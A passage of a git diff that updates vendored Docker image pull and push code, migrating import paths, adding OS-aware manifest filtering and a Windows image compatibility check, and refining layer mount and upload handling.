reference.ParseNormalizedNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd") if err != nil { t.Fatal("could not parse reference") } diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go index 45a7a0c150..0be8a03242 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go @@ -1,13 +1,34 @@ // +build !windows -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" + "runtime" + "github.com/docker/distribution" - "github.com/docker/distribution/context" + "github.com/docker/distribution/manifest/manifestlist" + "github.com/sirupsen/logrus" ) func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { blobs := ld.repo.Blobs(ctx) return blobs.Open(ctx, ld.digest) } + +func filterManifests(manifests []manifestlist.ManifestDescriptor, os string) []manifestlist.ManifestDescriptor { + var matches []manifestlist.ManifestDescriptor + for _, manifestDescriptor := range manifests { + if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == os { + matches = append(matches, manifestDescriptor) + + logrus.Debugf("found match for %s/%s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.MediaType, manifestDescriptor.Digest.String()) + } + } + return matches +} + +// checkImageCompatibility is a Windows-specific function. 
No-op on Linux +func checkImageCompatibility(imageOS, imageOSVersion string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go index aefed86601..432a36119d 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go @@ -1,16 +1,22 @@ -// +build windows - -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" + "errors" + "fmt" "net/http" "os" + "runtime" + "sort" + "strconv" + "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/context" + "github.com/docker/distribution/manifest/manifestlist" "github.com/docker/distribution/manifest/schema2" "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) var _ distribution.Describable = &v2LayerDescriptor{} @@ -23,20 +29,28 @@ func (ld *v2LayerDescriptor) Descriptor() distribution.Descriptor { } func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { + blobs := ld.repo.Blobs(ctx) + rsc, err := blobs.Open(ctx, ld.digest) + if len(ld.src.URLs) == 0 { - blobs := ld.repo.Blobs(ctx) - return blobs.Open(ctx, ld.digest) + return rsc, err } - var ( - err error - rsc distribution.ReadSeekCloser - ) + // We're done if the registry has this blob. + if err == nil { + // Seek does an HTTP GET. If it succeeds, the blob really is accessible. + if _, err = rsc.Seek(0, os.SEEK_SET); err == nil { + return rsc, nil + } + rsc.Close() + } // Find the first URL that results in a 200 result code. for _, url := range ld.src.URLs { logrus.Debugf("Pulling %v from foreign URL %v", ld.digest, url) rsc = transport.NewHTTPReadSeeker(http.DefaultClient, url, nil) + + // Seek does an HTTP GET. 
If it succeeds, the blob really is accessible. _, err = rsc.Seek(0, os.SEEK_SET) if err == nil { break @@ -47,3 +61,70 @@ func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekClo } return rsc, err } + +func filterManifests(manifests []manifestlist.ManifestDescriptor, os string) []manifestlist.ManifestDescriptor { + osVersion := "" + if os == "windows" { + version := system.GetOSVersion() + osVersion = fmt.Sprintf("%d.%d.%d", version.MajorVersion, version.MinorVersion, version.Build) + logrus.Debugf("will prefer entries with version %s", osVersion) + } + + var matches []manifestlist.ManifestDescriptor + for _, manifestDescriptor := range manifests { + if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == os { + matches = append(matches, manifestDescriptor) + logrus.Debugf("found match for %s/%s %s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.Platform.OSVersion, manifestDescriptor.MediaType, manifestDescriptor.Digest.String()) + } else { + logrus.Debugf("ignoring %s/%s %s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.Platform.OSVersion, manifestDescriptor.MediaType, manifestDescriptor.Digest.String()) + } + } + if os == "windows" { + sort.Stable(manifestsByVersion{osVersion, matches}) + } + return matches +} + +func versionMatch(actual, expected string) bool { + // Check whether the version matches up to the build, ignoring UBR + return strings.HasPrefix(actual, expected+".") +} + +type manifestsByVersion struct { + version string + list []manifestlist.ManifestDescriptor +} + +func (mbv manifestsByVersion) Less(i, j int) bool { + // TODO: Split version by parts and compare + // TODO: Prefer versions which have a greater version number + // Move compatible versions to the top, with no other ordering changes + return versionMatch(mbv.list[i].Platform.OSVersion, mbv.version) && !versionMatch(mbv.list[j].Platform.OSVersion, mbv.version) +} + +func (mbv 
manifestsByVersion) Len() int { + return len(mbv.list) +} + +func (mbv manifestsByVersion) Swap(i, j int) { + mbv.list[i], mbv.list[j] = mbv.list[j], mbv.list[i] +} + +// checkImageCompatibility blocks pulling incompatible images based on a later OS build +// Fixes https://github.com/moby/moby/issues/36184. +func checkImageCompatibility(imageOS, imageOSVersion string) error { + if imageOS == "windows" { + hostOSV := system.GetOSVersion() + splitImageOSVersion := strings.Split(imageOSVersion, ".") // eg 10.0.16299.nnnn + if len(splitImageOSVersion) >= 3 { + if imageOSBuild, err := strconv.Atoi(splitImageOSVersion[2]); err == nil { + if imageOSBuild > int(hostOSV.Build) { + errMsg := fmt.Sprintf("a Windows version %s.%s.%s-based image is incompatible with a %s host", splitImageOSVersion[0], splitImageOSVersion[1], splitImageOSVersion[2], hostOSV.ToString()) + logrus.Debugf(errMsg) + return errors.New(errMsg) + } + } + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/push.go b/vendor/github.com/docker/docker/distribution/push.go index d35bdb103e..eb3bc55974 100644 --- a/vendor/github.com/docker/docker/distribution/push.go +++ b/vendor/github.com/docker/docker/distribution/push.go @@ -1,17 +1,17 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( "bufio" "compress/gzip" + "context" "fmt" "io" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) // Pusher is an interface that abstracts pushing for different API versions. 
@@ -64,16 +64,16 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo return err } - endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(repoInfo.Hostname()) + endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(reference.Domain(repoInfo.Name)) if err != nil { return err } - progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to a repository [%s]", repoInfo.FullName()) + progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to repository [%s]", repoInfo.Name.Name()) - associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo) + associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo.Name) if len(associations) == 0 { - return fmt.Errorf("An image does not exist locally with the tag: %s", repoInfo.Name()) + return fmt.Errorf("An image does not exist locally with the tag: %s", reference.FamiliarName(repoInfo.Name)) } var ( @@ -106,7 +106,7 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo } } - logrus.Debugf("Trying to push %s to %s %s", repoInfo.FullName(), endpoint.URL, endpoint.Version) + logrus.Debugf("Trying to push %s to %s %s", repoInfo.Name.Name(), endpoint.URL, endpoint.Version) pusher, err := NewPusher(ref, endpoint, repoInfo, imagePushConfig) if err != nil { @@ -126,7 +126,7 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo } err = fallbackErr.err lastErr = err - logrus.Errorf("Attempting next endpoint for push after error: %v", err) + logrus.Infof("Attempting next endpoint for push after error: %v", err) continue } } @@ -135,12 +135,12 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo return err } - imagePushConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "push") + imagePushConfig.ImageEventLogger(reference.FamiliarString(ref), reference.FamiliarName(repoInfo.Name), "push") return nil } if lastErr == nil { - lastErr 
= fmt.Errorf("no endpoints found for %s", repoInfo.FullName()) + lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.Name.Name()) } return lastErr } diff --git a/vendor/github.com/docker/docker/distribution/push_v1.go b/vendor/github.com/docker/docker/distribution/push_v1.go index 257ac181ec..7bd75e9fe6 100644 --- a/vendor/github.com/docker/docker/distribution/push_v1.go +++ b/vendor/github.com/docker/docker/distribution/push_v1.go @@ -1,11 +1,11 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "fmt" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/dockerversion" @@ -15,9 +15,10 @@ import ( "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) type v1Pusher struct { @@ -38,14 +39,10 @@ func (p *v1Pusher) Push(ctx context.Context) error { tr := transport.NewTransport( // TODO(tiborvass): was NoTimeout registry.NewTransport(tlsConfig), - registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + registry.Headers(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., ) client := registry.HTTPClient(tr) - v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) - if err != nil { - logrus.Debugf("Could not get v1 endpoint: %v", err) - return fallbackError{err: err} - } + v1Endpoint := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) p.session, err = registry.NewSession(client, p.config.AuthConfig, 
v1Endpoint) if err != nil { // TODO(dmcgowan): Check if should fallback @@ -118,10 +115,10 @@ type v1DependencyImage struct { v1ImageCommon } -func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1DependencyImage, error) { +func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) *v1DependencyImage { v1ID := digest.Digest(l.ChainID()).Hex() - config := "" + var config string if parent != nil { config = fmt.Sprintf(`{"id":"%s","parent":"%s"}`, v1ID, parent.V1ID()) } else { @@ -133,7 +130,7 @@ func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1Dependen config: []byte(config), layer: l, }, - }, nil + } } // Retrieve the all the images to be uploaded in the correct order @@ -214,7 +211,10 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch topLayerID := img.RootFS.ChainID() - pl, err := p.config.LayerStore.Get(topLayerID) + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, system.ErrNotSupportedOperatingSystem + } + pl, err := p.config.LayerStores[img.OperatingSystem()].Get(topLayerID) *referencedLayers = append(*referencedLayers, pl) if err != nil { return nil, fmt.Errorf("failed to get top layer from image: %v", err) @@ -227,10 +227,7 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch } l := lsl.Layer - dependencyImages, parent, err := generateDependencyImages(l.Parent(), dependenciesSeen) - if err != nil { - return nil, err - } + dependencyImages, parent := generateDependencyImages(l.Parent(), dependenciesSeen) topImage, err := newV1TopImage(imgID, img, l, parent) if err != nil { @@ -242,32 +239,29 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch return } -func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage, err error) { +func generateDependencyImages(l layer.Layer, dependenciesSeen 
map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage) { if l == nil { - return nil, nil, nil + return nil, nil } - imageListForThisTag, parent, err = generateDependencyImages(l.Parent(), dependenciesSeen) + imageListForThisTag, parent = generateDependencyImages(l.Parent(), dependenciesSeen) if dependenciesSeen != nil { if dependencyImage, present := dependenciesSeen[l.ChainID()]; present { // This layer is already on the list, we can ignore it // and all its parents. - return imageListForThisTag, dependencyImage, nil + return imageListForThisTag, dependencyImage } } - dependencyImage, err := newV1DependencyImage(l, parent) - if err != nil { - return nil, nil, err - } + dependencyImage := newV1DependencyImage(l, parent) imageListForThisTag = append(imageListForThisTag, dependencyImage) if dependenciesSeen != nil { dependenciesSeen[l.ChainID()] = dependencyImage } - return imageListForThisTag, dependencyImage, nil + return imageListForThisTag, dependencyImage } // createImageIndex returns an index of an image's layer IDs and tags. 
@@ -362,8 +356,8 @@ func (p *v1Pusher) pushImageToEndpoint(ctx context.Context, endpoint string, ima } if topImage, isTopImage := img.(*v1TopImage); isTopImage { for _, tag := range tags[topImage.imageID] { - progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+p.repoInfo.RemoteName()+"/tags/"+tag) - if err := p.session.PushRegistryTag(p.repoInfo, v1ID, tag, endpoint); err != nil { + progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+reference.Path(p.repoInfo.Name)+"/tags/"+tag) + if err := p.session.PushRegistryTag(p.repoInfo.Name, v1ID, tag, endpoint); err != nil { return err } } @@ -391,7 +385,7 @@ func (p *v1Pusher) pushRepository(ctx context.Context) error { // Register all the images in a repository with the registry // If an image is not in this list it will not be associated with the repository - repoData, err := p.session.PushImageJSONIndex(p.repoInfo, imageIndex, false, nil) + repoData, err := p.session.PushImageJSONIndex(p.repoInfo.Name, imageIndex, false, nil) if err != nil { return err } @@ -401,7 +395,7 @@ func (p *v1Pusher) pushRepository(ctx context.Context) error { return err } } - _, err = p.session.PushImageJSONIndex(p.repoInfo, imageIndex, true, repoData.Endpoints) + _, err = p.session.PushImageJSONIndex(p.repoInfo.Name, imageIndex, true, repoData.Endpoints) return err } diff --git a/vendor/github.com/docker/docker/distribution/push_v2.go b/vendor/github.com/docker/docker/distribution/push_v2.go index 1f8c822fec..9dc3e7a2a6 100644 --- a/vendor/github.com/docker/docker/distribution/push_v2.go +++ b/vendor/github.com/docker/docker/distribution/push_v2.go @@ -1,6 +1,7 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "errors" "fmt" "io" @@ -9,23 +10,22 @@ import ( "strings" "sync" - "golang.org/x/net/context" - - 
"github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema1" "github.com/docker/distribution/manifest/schema2" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/api/errcode" "github.com/docker/distribution/registry/client" + apitypes "github.com/docker/docker/api/types" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/distribution/xfer" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) const ( @@ -33,15 +33,6 @@ const ( middleLayerMaximumSize = 10 * (1 << 20) // 10MB ) -// PushResult contains the tag, manifest digest, and manifest size from the -// push. It's used to signal this information to the trust code in the client -// so it can sign the manifest if necessary. -type PushResult struct { - Tag string - Digest digest.Digest - Size int -} - type v2Pusher struct { v2MetadataService metadata.V2MetadataService ref reference.Named @@ -64,19 +55,21 @@ type pushState struct { // confirmedV2 is set to true if we confirm we're talking to a v2 // registry. This is used to limit fallbacks to the v1 protocol. 
confirmedV2 bool + hasAuthInfo bool } func (p *v2Pusher) Push(ctx context.Context) (err error) { p.pushState.remoteLayers = make(map[layer.DiffID]distribution.Descriptor) p.repo, p.pushState.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "push", "pull") + p.pushState.hasAuthInfo = p.config.AuthConfig.RegistryToken != "" || (p.config.AuthConfig.Username != "" && p.config.AuthConfig.Password != "") if err != nil { logrus.Debugf("Error getting v2 registry: %v", err) return err } if err = p.pushV2Repository(ctx); err != nil { - if continueOnError(err) { + if continueOnError(err, p.endpoint.Mirror) { return fallbackError{ err: err, confirmedV2: p.pushState.confirmedV2, @@ -91,7 +84,7 @@ func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) { if namedTagged, isNamedTagged := p.ref.(reference.NamedTagged); isNamedTagged { imageID, err := p.config.ReferenceStore.Get(p.ref) if err != nil { - return fmt.Errorf("tag does not exist: %s", p.ref.String()) + return fmt.Errorf("tag does not exist: %s", reference.FamiliarString(p.ref)) } return p.pushV2Tag(ctx, namedTagged, imageID) @@ -113,26 +106,31 @@ func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) { } if pushed == 0 { - return fmt.Errorf("no tags to push for %s", p.repoInfo.Name()) + return fmt.Errorf("no tags to push for %s", reference.FamiliarName(p.repoInfo.Name)) } return nil } func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id digest.Digest) error { - logrus.Debugf("Pushing repository: %s", ref.String()) + logrus.Debugf("Pushing repository: %s", reference.FamiliarString(ref)) imgConfig, err := p.config.ImageStore.Get(id) if err != nil { - return fmt.Errorf("could not find image from tag %s: %v", ref.String(), err) + return fmt.Errorf("could not find image from tag %s: %v", reference.FamiliarString(ref), err) } rootfs, err := p.config.ImageStore.RootFSFromConfig(imgConfig) if err != nil { - return 
fmt.Errorf("unable to get rootfs for image %s: %s", ref.String(), err) + return fmt.Errorf("unable to get rootfs for image %s: %s", reference.FamiliarString(ref), err) + } + + platform, err := p.config.ImageStore.PlatformFromConfig(imgConfig) + if err != nil { + return fmt.Errorf("unable to get platform for image %s: %s", reference.FamiliarString(ref), err) } - l, err := p.config.LayerStore.Get(rootfs.ChainID()) + l, err := p.config.LayerStores[platform.OS].Get(rootfs.ChainID()) if err != nil { return fmt.Errorf("failed to get top layer from image: %v", err) } @@ -148,14 +146,15 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id descriptorTemplate := v2PushDescriptor{ v2MetadataService: p.v2MetadataService, hmacKey: hmacKey, - repoInfo: p.repoInfo, + repoInfo: p.repoInfo.Name, ref: p.ref, + endpoint: p.endpoint, repo: p.repo, pushState: &p.pushState, } // Loop bounds condition is to avoid pushing the base layer on Windows. - for i := 0; i < len(rootfs.DiffIDs); i++ { + for range rootfs.DiffIDs { descriptor := descriptorTemplate descriptor.layer = l descriptor.checkedDigests = make(map[digest.Digest]struct{}) @@ -189,7 +188,7 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id logrus.Warnf("failed to upload schema2 manifest: %v - falling back to schema1", err) - manifestRef, err := distreference.WithTag(p.repo.Named(), ref.Tag()) + manifestRef, err := reference.WithTag(p.repo.Named(), ref.Tag()) if err != nil { return err } @@ -225,7 +224,7 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id // Signal digest to the trust client so it can sign the // push, if appropriate. 
- progress.Aux(p.config.ProgressOutput, PushResult{Tag: ref.Tag(), Digest: manifestDigest, Size: len(canonicalManifest)}) + progress.Aux(p.config.ProgressOutput, apitypes.PushResult{Tag: ref.Tag(), Digest: manifestDigest.String(), Size: len(canonicalManifest)}) return nil } @@ -248,6 +247,7 @@ type v2PushDescriptor struct { hmacKey []byte repoInfo reference.Named ref reference.Named + endpoint registry.APIEndpoint repo distribution.Repository pushState *pushState remoteDescriptor distribution.Descriptor @@ -256,7 +256,7 @@ type v2PushDescriptor struct { } func (pd *v2PushDescriptor) Key() string { - return "v2push:" + pd.ref.FullName() + " " + pd.layer.DiffID().String() + return "v2push:" + pd.ref.Name() + " " + pd.layer.DiffID().String() } func (pd *v2PushDescriptor) ID() string { @@ -268,10 +268,13 @@ func (pd *v2PushDescriptor) DiffID() layer.DiffID { } func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) { - if fs, ok := pd.layer.(distribution.Describable); ok { - if d := fs.Descriptor(); len(d.URLs) > 0 { - progress.Update(progressOutput, pd.ID(), "Skipped foreign layer") - return d, nil + // Skip foreign layers unless this registry allows nondistributable artifacts. + if !pd.endpoint.AllowNondistributableArtifacts { + if fs, ok := pd.layer.(distribution.Describable); ok { + if d := fs.Descriptor(); len(d.URLs) > 0 { + progress.Update(progressOutput, pd.ID(), "Skipped foreign layer") + return d, nil + } } } @@ -292,8 +295,8 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. // Do we have any metadata associated with this layer's DiffID? 
v2Metadata, err := pd.v2MetadataService.GetMetadata(diffID) if err == nil { - // check for blob existence in the target repository if we have a mapping with it - descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, false, 1, v2Metadata) + // check for blob existence in the target repository + descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, true, 1, v2Metadata) if exists || err != nil { return descriptor, err } @@ -307,28 +310,28 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. // Attempt to find another repository in the same registry to mount the layer from to avoid an unnecessary upload candidates := getRepositoryMountCandidates(pd.repoInfo, pd.hmacKey, maxMountAttempts, v2Metadata) + isUnauthorizedError := false for _, mountCandidate := range candidates { logrus.Debugf("attempting to mount layer %s (%s) from %s", diffID, mountCandidate.Digest, mountCandidate.SourceRepository) createOpts := []distribution.BlobCreateOption{} if len(mountCandidate.SourceRepository) > 0 { - namedRef, err := reference.WithName(mountCandidate.SourceRepository) + namedRef, err := reference.ParseNormalizedNamed(mountCandidate.SourceRepository) if err != nil { - logrus.Errorf("failed to parse source repository reference %v: %v", namedRef.String(), err) + logrus.Errorf("failed to parse source repository reference %v: %v", reference.FamiliarString(namedRef), err) pd.v2MetadataService.Remove(mountCandidate) continue } - // TODO (brianbland): We need to construct a reference where the Name is - // only the full remote name, so clean this up when distribution has a - // richer reference package - remoteRef, err := distreference.WithName(namedRef.RemoteName()) + // Candidates are always under same domain, create remote reference + // with only path to set mount from with + remoteRef, err := reference.WithName(reference.Path(namedRef)) if err != nil { - logrus.Errorf("failed to make remote reference out of 
%q: %v", namedRef.RemoteName(), namedRef.RemoteName()) + logrus.Errorf("failed to make remote reference out of %q: %v", reference.Path(namedRef), err) continue } - canonicalRef, err := distreference.WithDigest(distreference.TrimNamed(remoteRef), mountCandidate.Digest) + canonicalRef, err := reference.WithDigest(reference.TrimNamed(remoteRef), mountCandidate.Digest) if err != nil { logrus.Errorf("failed to make canonical reference: %v", err) continue @@ -355,16 +358,31 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. // Cache mapping from this layer's DiffID to the blobsum if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ Digest: err.Descriptor.Digest, - SourceRepository: pd.repoInfo.FullName(), + SourceRepository: pd.repoInfo.Name(), }); err != nil { return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} } return err.Descriptor, nil + case errcode.Errors: + for _, e := range err { + switch e := e.(type) { + case errcode.Error: + if e.Code == errcode.ErrorCodeUnauthorized { + // when unauthorized error that indicate user don't has right to push layer to register + logrus.Debugln("failed to push layer to registry because unauthorized error") + isUnauthorizedError = true + } + default: + } + } default: logrus.Infof("failed to mount layer %s (%s) from %s: %v", diffID, mountCandidate.Digest, mountCandidate.SourceRepository, err) } + // when error is unauthorizedError and user don't hasAuthInfo that's the case user don't has right to push layer to register + // and he hasn't login either, in this case candidate cache should be removed if len(mountCandidate.SourceRepository) > 0 && + !(isUnauthorizedError && !pd.pushState.hasAuthInfo) && (metadata.CheckV2MetadataHMAC(&mountCandidate, pd.hmacKey) || len(mountCandidate.HMAC) == 0) { cause := "blob mount failure" @@ -398,14 +416,8 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. 
} } defer layerUpload.Close() - // upload the blob - desc, err := pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload) - if err != nil { - return desc, err - } - - return desc, nil + return pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload) } func (pd *v2PushDescriptor) SetRemoteDescriptor(descriptor distribution.Descriptor) { @@ -425,6 +437,10 @@ func (pd *v2PushDescriptor) uploadUsingSession( var reader io.ReadCloser contentReader, err := pd.layer.Open() + if err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + size, _ := pd.layer.Size() reader = progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, contentReader), progressOutput, size, pd.ID(), "Pushing") @@ -443,7 +459,7 @@ func (pd *v2PushDescriptor) uploadUsingSession( return distribution.Descriptor{}, fmt.Errorf("unsupported layer media type %s", m) } - digester := digest.Canonical.New() + digester := digest.Canonical.Digester() tee := io.TeeReader(reader, digester.Hash()) nn, err := layerUpload.ReadFrom(tee) @@ -463,7 +479,7 @@ func (pd *v2PushDescriptor) uploadUsingSession( // Cache mapping from this layer's DiffID to the blobsum if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ Digest: pushDigest, - SourceRepository: pd.repoInfo.FullName(), + SourceRepository: pd.repoInfo.Name(), }); err != nil { return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} } @@ -498,7 +514,7 @@ func (pd *v2PushDescriptor) layerAlreadyExists( // filter the metadata candidates := []metadata.V2Metadata{} for _, meta := range v2Metadata { - if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.FullName() { + if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.Name() { continue } candidates = append(candidates, meta) @@ -529,16 +545,16 @@ func (pd *v2PushDescriptor) layerAlreadyExists( attempts: for _, dgst := range layerDigests { meta := 
digestToMetadata[dgst] - logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.Name()) desc, err = pd.repo.Blobs(ctx).Stat(ctx, dgst) pd.checkedDigests[meta.Digest] = struct{}{} switch err { case nil: - if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.FullName() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) { + if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.Name() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) { // cache mapping from this layer's DiffID to the blobsum if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ Digest: desc.Digest, - SourceRepository: pd.repoInfo.FullName(), + SourceRepository: pd.repoInfo.Name(), }); err != nil { return distribution.Descriptor{}, false, xfer.DoNotRetry{Err: err} } @@ -547,12 +563,12 @@ attempts: exists = true break attempts case distribution.ErrBlobUnknown: - if meta.SourceRepository == pd.repoInfo.FullName() { + if meta.SourceRepository == pd.repoInfo.Name() { // remove the mapping to the target repository pd.v2MetadataService.Remove(*meta) } default: - logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.Name()) } } @@ -595,7 +611,7 @@ func getMaxMountAndExistenceCheckAttempts(layer PushLayer) (maxMountAttempts, ma } // getRepositoryMountCandidates returns an array of v2 metadata items belonging to the given registry. The -// array is sorted from youngest to oldest. If requireReigstryMatch is true, the resulting array will contain +// array is sorted from youngest to oldest. 
If requireRegistryMatch is true, the resulting array will contain // only metadata entries having registry part of SourceRepository matching the part of repoInfo. func getRepositoryMountCandidates( repoInfo reference.Named, @@ -606,11 +622,11 @@ func getRepositoryMountCandidates( candidates := []metadata.V2Metadata{} for _, meta := range v2Metadata { sourceRepo, err := reference.ParseNamed(meta.SourceRepository) - if err != nil || repoInfo.Hostname() != sourceRepo.Hostname() { + if err != nil || reference.Domain(repoInfo) != reference.Domain(sourceRepo) { continue } // target repository is not a viable candidate - if meta.SourceRepository == repoInfo.FullName() { + if meta.SourceRepository == repoInfo.Name() { continue } candidates = append(candidates, meta) @@ -652,6 +668,7 @@ func (bla byLikeness) Swap(i, j int) { } func (bla byLikeness) Len() int { return len(bla.arr) } +// nolint: interfacer func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, marr []metadata.V2Metadata) { // reverse the metadata array to shift the newest entries to the beginning for i := 0; i < len(marr)/2; i++ { @@ -661,7 +678,7 @@ func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, ma sort.Stable(byLikeness{ arr: marr, hmacKey: hmacKey, - pathComponents: getPathComponents(repoInfo.FullName()), + pathComponents: getPathComponents(repoInfo.Name()), }) } @@ -678,11 +695,6 @@ func numOfMatchingPathComponents(pth string, matchComponents []string) int { } func getPathComponents(path string) []string { - // make sure to add docker.io/ prefix to the path - named, err := reference.ParseNamed(path) - if err == nil { - path = named.FullName() - } return strings.Split(path, "/") } diff --git a/vendor/github.com/docker/docker/distribution/push_v2_test.go b/vendor/github.com/docker/docker/distribution/push_v2_test.go index 6a5216b1d0..436b4a1797 100644 --- a/vendor/github.com/docker/docker/distribution/push_v2_test.go +++ 
